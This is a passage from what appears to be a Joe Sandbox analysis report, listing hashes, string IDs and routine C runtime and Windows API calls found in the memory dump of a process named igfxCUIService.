                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                   Yara matches
                                   Similarity
                                   • API ID: _free
                                   • String ID:
                                   • API String ID: 269201875-0
                                   • Opcode ID: a0466fa94846f970d963981f2cee54097b58ad89171fd4084f3e333793f92a66
                                   • Instruction ID: bb0ab3e815b3a69f8f4ecba656063053715850fa4e6f9b36b98e4c72ab0f78ae
                                   • Opcode Fuzzy Hash: a0466fa94846f970d963981f2cee54097b58ad89171fd4084f3e333793f92a66
                                   • Instruction Fuzzy Hash: 71C11272E41204ABDB60DBA8CC83FDA77F8EF09700F144565FA49EB282D6B4D94197B4
                                   Uniqueness
                                   • Uniqueness Score: 0.02%

                                  APIs
                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00D39323
                                  • type_info::operator==.LIBVCRUNTIME ref: 00D3934A
                                  • ___TypeMatch.LIBVCRUNTIME ref: 00D39456
                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00D39531
                                  • _UnwindNestedFrames.LIBCMT ref: 00D395B8
                                  • CallUnexpected.LIBVCRUNTIME ref: 00D395D3
                                  Strings
                                   Memory Dump Source
                                   • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                   Yara matches
                                   Similarity
                                   • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                   • String ID: csm$csm$csm
                                   • API String ID: 2123188842-393685449
                                   • Opcode ID: fcce4f60338aff63c1642cfc1050934616b011c6851584e821389dde02f9106a
                                   • Instruction ID: cc36048c6943c62e5f00492ec752ca0167d328f4834b15c3ea054ce0e73e695c
                                   • Opcode Fuzzy Hash: fcce4f60338aff63c1642cfc1050934616b011c6851584e821389dde02f9106a
                                   • Instruction Fuzzy Hash: 6DC147B1800219EFCF25DFA8D8919AEFBB5EF04310F08415AF8156B252D7B5DA91CBB1
                                   Uniqueness
                                   • Uniqueness Score: 100.00%

                                  APIs
                                  • _free.LIBCMT ref: 00D46E6B
                                    • Part of subcall function 00D468D3: HeapFree.KERNEL32(00000000,00000000,?,00D4D25C,?,00000000,?,?,?,00D4D4FF,?,00000007,?,?,00D4DA9C,?), ref: 00D468E9
                                    • Part of subcall function 00D468D3: GetLastError.KERNEL32(?,?,00D4D25C,?,00000000,?,?,?,00D4D4FF,?,00000007,?,?,00D4DA9C,?,?), ref: 00D468FB
                                  • _free.LIBCMT ref: 00D46E77
                                  • _free.LIBCMT ref: 00D46E82
                                  • _free.LIBCMT ref: 00D46E8D
                                  • _free.LIBCMT ref: 00D46E98
                                  • _free.LIBCMT ref: 00D46EA3
                                  • _free.LIBCMT ref: 00D46EAE
                                  • _free.LIBCMT ref: 00D46EB9
                                  • _free.LIBCMT ref: 00D46EC4
                                  • _free.LIBCMT ref: 00D46ED2
                                   Memory Dump Source
                                   • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                   Yara matches
                                   Similarity
                                   • API ID: _free$ErrorFreeHeapLast
                                   • String ID:
                                   • API String ID: 776569668-0
                                   • Opcode ID: ecd1ebe10c6030474237ca878638c30ef078a17363d317cc8ca8c94f0c6e37e9
                                   • Instruction ID: b6e6cf6218ebff1fe3b4eb5e91e70ac7cf3a7eeededc773b2316796ae4496372
                                   • Opcode Fuzzy Hash: ecd1ebe10c6030474237ca878638c30ef078a17363d317cc8ca8c94f0c6e37e9
                                   • Instruction Fuzzy Hash: DB218576D0411CBFCB41EFA4C881DDE7BB9EF09340B0042A6B5169B161DB75EA448BA1
                                   Uniqueness
                                   • Uniqueness Score: 0.02%

                                  Strings
                                   Memory Dump Source
                                   • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                   Yara matches
                                   Similarity
                                   • API ID:
                                   • String ID: ,$array$object$object key$object separator$value
                                   • API String ID: 0-1191195158
                                   • Opcode ID: d97f1ac0e94a892bf19948025ac3cdf2d2c775f073f2070ac763032a318eb1cb
                                   • Instruction ID: 848de86797410238a9081f8aa742a9cc5a079cae3ad14105a2fa36b64044fb15
                                   • Opcode Fuzzy Hash: d97f1ac0e94a892bf19948025ac3cdf2d2c775f073f2070ac763032a318eb1cb
                                   • Instruction Fuzzy Hash: 4C027930904258DFDB21DF64C855BEEFBB4BF19304F148199D449A7682DB70AA88CFB1
                                   Uniqueness
                                   • Uniqueness Score: 100.00%

                                  APIs
                                   Memory Dump Source
                                   • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                   Yara matches
                                   Similarity
                                   • API ID: _free
                                   • String ID:
                                   • API String ID: 269201875-0
                                   • Opcode ID: 878e9c5841c591da3b709aaa1df4e88c6314403233c7e49f8a3d6be34a9274dd
                                   • Instruction ID: a24e323e8bcf549c1a2e42cae9de154f9ba6a281f926fbcda962a2ef4ddead19
                                   • Opcode Fuzzy Hash: 878e9c5841c591da3b709aaa1df4e88c6314403233c7e49f8a3d6be34a9274dd
                                   • Instruction Fuzzy Hash: 2961A371900745AFDB20DF64C881BABB7EAEB46310F244569E996EB281EB70DD40CB71
                                   Uniqueness
                                   • Uniqueness Score: 0.02%

                                  APIs
                                   Memory Dump Source
                                   • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                   Yara matches
                                   Similarity
                                   • API ID: _free$___from_strstr_to_strchr
                                   • String ID:
                                   • API String ID: 3409252457-0
                                   • Opcode ID: 66d983d8b719662b9fc094d9e8770de51a68a3dbeb7b26846c20cc9fa49a60a9
                                   • Instruction ID: 39320663820526d003a85ae972aa2c1eca5d034ea790199cbc04cfcded8f9e0d
                                   • Opcode Fuzzy Hash: 66d983d8b719662b9fc094d9e8770de51a68a3dbeb7b26846c20cc9fa49a60a9
                                   • Instruction Fuzzy Hash: FE51F671E05301EFDF24AFB8DC41AAE7BA4EF16320F18416AE51597282EB72C944CB71
                                   Uniqueness
                                   • Uniqueness Score: 1.23%

                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 00D36A27
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00D36A2F
                                  • _ValidateLocalCookies.LIBCMT ref: 00D36AB8
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00D36AE3
                                  • _ValidateLocalCookies.LIBCMT ref: 00D36B38
                                  Strings
                                   Memory Dump Source
                                   • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                   Yara matches
                                   Similarity
                                   • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                   • String ID: csm
                                   • API String ID: 1170836740-1018135373
                                   • Opcode ID: a43b723f64beb96c94ef84916997a45369c2d5a72de94ee8341042adf01b8371
                                   • Instruction ID: 458a3f057cedecebc6b195e24d932bf14217a25b8dc931bc612b0430fd191a21
                                   • Opcode Fuzzy Hash: a43b723f64beb96c94ef84916997a45369c2d5a72de94ee8341042adf01b8371
                                   • Instruction Fuzzy Hash: 58415F34A00219AFCF10DF68C885A9EBBB5EF45314F18C155E815AB392D771E915CFB1
                                   Uniqueness
                                   • Uniqueness Score: 100.00%

                                  Strings
                                   Memory Dump Source
                                   • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                   Yara matches
                                   Similarity
                                   • API ID:
                                   • String ID: api-ms-$ext-ms-
                                   • API String ID: 0-537541572
                                   • Opcode ID: c93a5f2809784a8e9b4a305deccbdd547cf17559685b82dce7786869dc4eb308
                                   • Instruction ID: a1c102e1a43f54678f6f1c4e73af500e84c05dac3564db432e3fabf36ed2a65d
                                   • Opcode Fuzzy Hash: c93a5f2809784a8e9b4a305deccbdd547cf17559685b82dce7786869dc4eb308
                                   • Instruction Fuzzy Hash: 2B21D631A05720ABCB23DB6A9CA5A2BB7589F15761F290620FE46E7395DB34DD00C6F0
                                   Uniqueness
                                   • Uniqueness Score: 0.38%

                                  APIs
                                    • Part of subcall function 00D4D232: _free.LIBCMT ref: 00D4D257
                                  • _free.LIBCMT ref: 00D4D534
                                    • Part of subcall function 00D468D3: HeapFree.KERNEL32(00000000,00000000,?,00D4D25C,?,00000000,?,?,?,00D4D4FF,?,00000007,?,?,00D4DA9C,?), ref: 00D468E9
                                    • Part of subcall function 00D468D3: GetLastError.KERNEL32(?,?,00D4D25C,?,00000000,?,?,?,00D4D4FF,?,00000007,?,?,00D4DA9C,?,?), ref: 00D468FB
                                  • _free.LIBCMT ref: 00D4D53F
                                  • _free.LIBCMT ref: 00D4D54A
                                  • _free.LIBCMT ref: 00D4D59E
                                  • _free.LIBCMT ref: 00D4D5A9
                                  • _free.LIBCMT ref: 00D4D5B4
                                  • _free.LIBCMT ref: 00D4D5BF
                                   Memory Dump Source
                                   • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                   Yara matches
                                   Similarity
                                   • API ID: _free$ErrorFreeHeapLast
                                   • String ID:
                                   • API String ID: 776569668-0
                                   • Opcode ID: 084be014b57c9f392aec073f6a7128653e534da61f4d2bc4e9e29790ebdef3b4
                                   • Instruction ID: 46635caa9dc1242521580c59d0ad70cd9d8bb7f16c9524770506731ae39ef351
                                   • Opcode Fuzzy Hash: 084be014b57c9f392aec073f6a7128653e534da61f4d2bc4e9e29790ebdef3b4
                                   • Instruction Fuzzy Hash: E0117C31581B44ABD620BBB0DC87FCB779EEF02700F404C25B29AAA092DAB8F5058775
                                   Uniqueness
                                   • Uniqueness Score: 0.02%

                                  APIs
                                  • GetConsoleCP.KERNEL32(00D41707,00000000,?), ref: 00D4807A
                                  • __fassign.LIBCMT ref: 00D48259
                                  • __fassign.LIBCMT ref: 00D48276
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D482BE
                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D482FE
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D483AA
                                   Memory Dump Source
                                   • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                   Yara matches
                                   Similarity
                                   • API ID: FileWrite__fassign$ConsoleErrorLast
                                   • String ID:
                                   • API String ID: 4031098158-0
                                   • Opcode ID: f250e20d13f1f420bce04a8653f8b623ebedbb53ed99f1eb5400a8656643b02a
                                   • Instruction ID: 0b793352faf0718c5f91fef561519b3a71d8306f464e07bd66b8709021be8e4d
                                   • Opcode Fuzzy Hash: f250e20d13f1f420bce04a8653f8b623ebedbb53ed99f1eb5400a8656643b02a
                                   • Instruction Fuzzy Hash: A7D18AB5D002589FCF15CFA8D9809EDBBB5EF49340F28416AE855FB342DB30A946DB60
                                   Uniqueness
                                   • Uniqueness Score: 0.81%

                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D2B5A7
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D2B5BD
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D2B9F7
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D2BA0D
                                  Strings
                                   Memory Dump Source
                                   • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                   Yara matches
                                   Similarity
                                   • API ID: ___std_exception_destroy
                                   • String ID: value
                                   • API String ID: 4194217158-494360628
                                   • Opcode ID: 58c1fce73e7ab1849f9128281837b600caa63b7e7b46a6dc683acc1e60110b14
                                   • Instruction ID: 47b97b593e26407874bd01089c3b06d37b1f7faf662a6b85038d3b48bdad7111
                                   • Opcode Fuzzy Hash: 58c1fce73e7ab1849f9128281837b600caa63b7e7b46a6dc683acc1e60110b14
                                   • Instruction Fuzzy Hash: 0E22B1309002698FDB28CF24D894BEEFBB5AF55314F1482D9D459A7782DBB46A84CF70
                                   Uniqueness
                                   • Uniqueness Score: 100.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D29CF0
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D29D12
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D29D32
                                  • __Getctype.LIBCPMT ref: 00D29DCB
                                  • std::_Facet_Register.LIBCPMT ref: 00D29DEA
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D29E02
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                  • String ID:
                                  • API String ID: 1102183713-0
                                  • Opcode ID: eee8a219fa329ea7a6c4e1d2834a278567346e7289b3875944ae383c8e8ac9d7
                                  • Instruction ID: 2d672395e98e6eb4d3bca2ca55827135e0df6da2278d17913c50b6633e81bb1f
                                  • Opcode Fuzzy Hash: eee8a219fa329ea7a6c4e1d2834a278567346e7289b3875944ae383c8e8ac9d7
                                  • Instruction Fuzzy Hash: B841C2719007249FCB10DF58E891AAAF7B4EF24724F188169E805AB391EB70ED45CBF1
                                  Uniqueness
                                  • Uniqueness Score: 1.47%

                                  APIs
                                  • GetLastError.KERNEL32(?,?,00D38EB1,00D370D0,00D34FB8), ref: 00D38EC8
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D38ED6
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D38EEF
                                  • SetLastError.KERNEL32(00000000,00D38EB1,00D370D0,00D34FB8), ref: 00D38F41
                                  Similarity
                                  • API ID: ErrorLastValue___vcrt_
                                  • String ID:
                                  • API String ID: 3852720340-0
                                  • Opcode ID: 6f578b3a19669943ed79fe67f3a61fa9414917f96e976f7cb9a01c7d3abedd7f
                                  • Instruction ID: 932afc871eb456264fba511186c9afe761371cde813b61ae457033561861ab96
                                  • Opcode Fuzzy Hash: 6f578b3a19669943ed79fe67f3a61fa9414917f96e976f7cb9a01c7d3abedd7f
                                  • Instruction Fuzzy Hash: 0601F73621D7215EAB24277DBC85A1A2745EF017B5F24033AF510951E0FFD3CC01A275
                                  Uniqueness
                                  • Uniqueness Score: 0.24%

                                  APIs
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00D3A04F,?,?,00D6F874,00000000,?,00D3A17A,00000004,InitializeCriticalSectionEx,00D5E0F4,00D5E0FC,00000000), ref: 00D3A01E
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID: api-ms-
                                  • API String ID: 3664257935-2084034818
                                  • Opcode ID: d4a28ea1a639407333fda08172cca373aa0ef8b621fed710c5bb8f2a1cc83168
                                  • Instruction ID: 73f65357c6e988824561be34761318acaf777f06dffdf2946d414774480afcb9
                                  • Opcode Fuzzy Hash: d4a28ea1a639407333fda08172cca373aa0ef8b621fed710c5bb8f2a1cc83168
                                  • Instruction Fuzzy Hash: 7811A331B00731ABDB268B6CDC44B5973949F05761F280220EE94EB3C8D7B5ED0086F2
                                  Uniqueness
                                  • Uniqueness Score: 1.64%

                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00D42B94,00000000,?,00D42B5C,?,?,00000000), ref: 00D42BB4
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D42BC7
                                  • FreeLibrary.KERNEL32(00000000,?,?,00D42B94,00000000,?,00D42B5C,?,?,00000000), ref: 00D42BEA
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 0e194e06803a670e44d5de47e9c79f314003dbe4fde2fd2559b08fa078792031
                                  • Instruction ID: b4a45d3a8aa7bf84f5aa4b1e71452286cd48a367c1a4592ee872854cf7697aa3
                                  • Opcode Fuzzy Hash: 0e194e06803a670e44d5de47e9c79f314003dbe4fde2fd2559b08fa078792031
                                  • Instruction Fuzzy Hash: D8F01231515729FBDB119F55DC0AF9D7B64EF04756F144150FC05E22A4CB709E04EAB2
                                  Uniqueness
                                  • Uniqueness Score: 100.00%

                                  APIs
                                    • Part of subcall function 00D46F6D: GetLastError.KERNEL32(00000008,?,00000000,00D4C55A,00D3591B,00D35961,?,00D357A8,00000000), ref: 00D46F72
                                    • Part of subcall function 00D46F6D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00D357A8,00000000), ref: 00D47010
                                  • _free.LIBCMT ref: 00D44CF9
                                  • _free.LIBCMT ref: 00D44D12
                                  • _free.LIBCMT ref: 00D44D50
                                  • _free.LIBCMT ref: 00D44D59
                                  • _free.LIBCMT ref: 00D44D65
                                  Similarity
                                  • API ID: _free$ErrorLast
                                  • String ID:
                                  • API String ID: 3291180501-0
                                  • Opcode ID: 346a95f76387a9a5ac49287ee10227d171f767a7a5db4fb9c68c309846660543
                                  • Instruction ID: 3fb16c9207eda513fda6c7c0286fa0d3b8073990f3a706261207024834343567
                                  • Opcode Fuzzy Hash: 346a95f76387a9a5ac49287ee10227d171f767a7a5db4fb9c68c309846660543
                                  • Instruction Fuzzy Hash: 0AB12A75A012199FDB24DF18C889BADB7B4FF48304F1845EAE949A7390D771AE90CF60
                                  Uniqueness
                                  • Uniqueness Score: 0.02%

                                  APIs
                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00D546A6,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00D5448D
                                  • __alloca_probe_16.LIBCMT ref: 00D54543
                                  • __alloca_probe_16.LIBCMT ref: 00D545D9
                                  • __freea.LIBCMT ref: 00D54644
                                  • __freea.LIBCMT ref: 00D54650
                                  Similarity
                                  • API ID: __alloca_probe_16__freea$Info
                                  • String ID:
                                  • API String ID: 2330168043-0
                                  • Opcode ID: 08f498da20941d0490539929c8044d9599733b771ffea7cc75bfa58fc02d8d8a
                                  • Instruction ID: 8d06515ff86be065e1a266bfccaf0a9b1f028a0c5a9a134a5adaa4ce7782a68f
                                  • Opcode Fuzzy Hash: 08f498da20941d0490539929c8044d9599733b771ffea7cc75bfa58fc02d8d8a
                                  • Instruction Fuzzy Hash: D581D372D00219ABDF209E658881FEF7BB5DF4A31AF1C0155EC54A7241E761CC88CBB2
                                  Uniqueness
                                  • Uniqueness Score: 5.06%

                                  APIs
                                  • __alloca_probe_16.LIBCMT ref: 00D4FCC2
                                  • __alloca_probe_16.LIBCMT ref: 00D4FD88
                                  • __freea.LIBCMT ref: 00D4FDF4
                                    • Part of subcall function 00D4690D: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D348E0,?,?,00D28B4A,?,?,00D11154), ref: 00D4693F
                                  • __freea.LIBCMT ref: 00D4FDFD
                                  • __freea.LIBCMT ref: 00D4FE20
                                  Similarity
                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                  • String ID:
                                  • API String ID: 1423051803-0
                                  • Opcode ID: 628a6f9f4ee263efc596f3a3fdab03f6705490c7e86c725320c5cf086cff5853
                                  • Instruction ID: 6642fc216f4a5510e5cfbcccf001b2c919fb88df6e1c33c51374261d8816c4d7
                                  • Opcode Fuzzy Hash: 628a6f9f4ee263efc596f3a3fdab03f6705490c7e86c725320c5cf086cff5853
                                  • Instruction Fuzzy Hash: F451B07290021AABEF259F64CC82EBB36A9EF45760F294139FD05A7161EB70DC5186B0
                                  Uniqueness
                                  • Uniqueness Score: 0.98%

                                  APIs
                                    • Part of subcall function 00D4690D: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D348E0,?,?,00D28B4A,?,?,00D11154), ref: 00D4693F
                                  • _free.LIBCMT ref: 00D44670
                                  • _free.LIBCMT ref: 00D44687
                                  • _free.LIBCMT ref: 00D446A4
                                  • _free.LIBCMT ref: 00D446BF
                                  • _free.LIBCMT ref: 00D446D6
                                  Similarity
                                  • API ID: _free$AllocateHeap
                                  • String ID:
                                  • API String ID: 3033488037-0
                                  • Opcode ID: 1f476168361ac1cdd28f085445439a418272701d3a22ce57f6319e6616949949
                                  • Instruction ID: d5c1598a3a0781fe71f557590eda45bd29c26217650dad4d15e5b36e49301103
                                  • Opcode Fuzzy Hash: 1f476168361ac1cdd28f085445439a418272701d3a22ce57f6319e6616949949
                                  • Instruction Fuzzy Hash: 3651F471A00304AFDB20DF69CC41BAA77F5EF46324F194669E849D7290E731DA40CBB0
                                  Uniqueness
                                  • Uniqueness Score: 0.02%

                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00D35F10
                                  • __alloca_probe_16.LIBCMT ref: 00D35F3C
                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00D35F7B
                                  • __alloca_probe_16.LIBCMT ref: 00D35FEF
                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00D36050
                                  Similarity
                                  • API ID: ByteCharMultiWide$__alloca_probe_16
                                  • String ID:
                                  • API String ID: 2135360126-0
                                  • Opcode ID: 8c45d8b35a63243a6f2c01e316753917fb855fb478579cb4cff563b7a388b0cc
                                  • Instruction ID: a701585f66e5109cc3a1642b922dbd8b2cc3ae7bf5fe76a5368444130e750100
                                  • Opcode Fuzzy Hash: 8c45d8b35a63243a6f2c01e316753917fb855fb478579cb4cff563b7a388b0cc
                                  • Instruction Fuzzy Hash: 1151BD7290021ABBDF259F64DC42EAF7BA9EF40750F198129FD14A6154EB75CD20CBB0
                                  Uniqueness
                                  • Uniqueness Score: 10.55%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D2A78D
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D2A7AD
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D2A7CD
                                  • std::_Facet_Register.LIBCPMT ref: 00D2A86B
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D2A883
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                  • String ID:
                                  • API String ID: 459529453-0
                                  • Opcode ID: 5ffc2a86b66550b077780a16be13100cfd55c70e09e47bd8608bc0210a5db057
                                  • Instruction ID: 2853c38a63b652d5f08bef33e2777828370aa8732392b588fe4e3503769bdfd3
                                  • Opcode Fuzzy Hash: 5ffc2a86b66550b077780a16be13100cfd55c70e09e47bd8608bc0210a5db057
                                  • Instruction Fuzzy Hash: 58419171900224DFCB18DF58E881BAABBB4EF14714F14416DE805AB391EB71AD46CBF2
                                  Uniqueness
                                  • Uniqueness Score: 0.53%

                                  APIs
                                  • _free.LIBCMT ref: 00D4CFD2
                                    • Part of subcall function 00D468D3: HeapFree.KERNEL32(00000000,00000000,?,00D4D25C,?,00000000,?,?,?,00D4D4FF,?,00000007,?,?,00D4DA9C,?), ref: 00D468E9
                                    • Part of subcall function 00D468D3: GetLastError.KERNEL32(?,?,00D4D25C,?,00000000,?,?,?,00D4D4FF,?,00000007,?,?,00D4DA9C,?,?), ref: 00D468FB
                                  • _free.LIBCMT ref: 00D4CFE4
                                  • _free.LIBCMT ref: 00D4CFF6
                                  • _free.LIBCMT ref: 00D4D008
                                  • _free.LIBCMT ref: 00D4D01A
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 5d4f3e9301c546caaf194652081b34b1a1f8b7b72de5fa4f77ed3607f5b6b78b
                                  • Instruction ID: f9acaef22bff10adbf7dcf823087888bd9f6e4e8a256d2d6bafa7f275a87189d
                                  • Opcode Fuzzy Hash: 5d4f3e9301c546caaf194652081b34b1a1f8b7b72de5fa4f77ed3607f5b6b78b
                                  • Instruction Fuzzy Hash: DBF03632505760A78620EB94F481C1B73DBEF037107580915F016D7A81CB7CFC8087B5
                                  Uniqueness
                                  • Uniqueness Score: 0.02%

                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00D1A484
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID: <$?$mxyz
                                  • API String ID: 118556049-2422011075
                                  • Opcode ID: 31f141627b44d42c5ffdefe9f82d67f390b46307052a94e8336927df0208a35e
                                  • Instruction ID: 0986d7296f5d19611ec23d242820d67738cf0e11a2e69841eab2450782752d62
                                  • Opcode Fuzzy Hash: 31f141627b44d42c5ffdefe9f82d67f390b46307052a94e8336927df0208a35e
                                  • Instruction Fuzzy Hash: 33610671D00248DBDB14DFA8D8447EEBBB4EF44314F14462DE415AB382DBB59A85C7B1
                                  Uniqueness
                                  • Uniqueness Score: 100.00%

                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D1362E
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D1363D
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: at line $, column
                                  • API String ID: 4194217158-191570568
                                  • Opcode ID: 91afcd7988a1aa4e63a59d2ecd8e60437bcdcec2777d904bdfe22156c7e0f392
                                  • Instruction ID: 361995ee5ae7e9cbe3723aa229c68eb4ba5131f1fcbaf95b3734a78fab4071b6
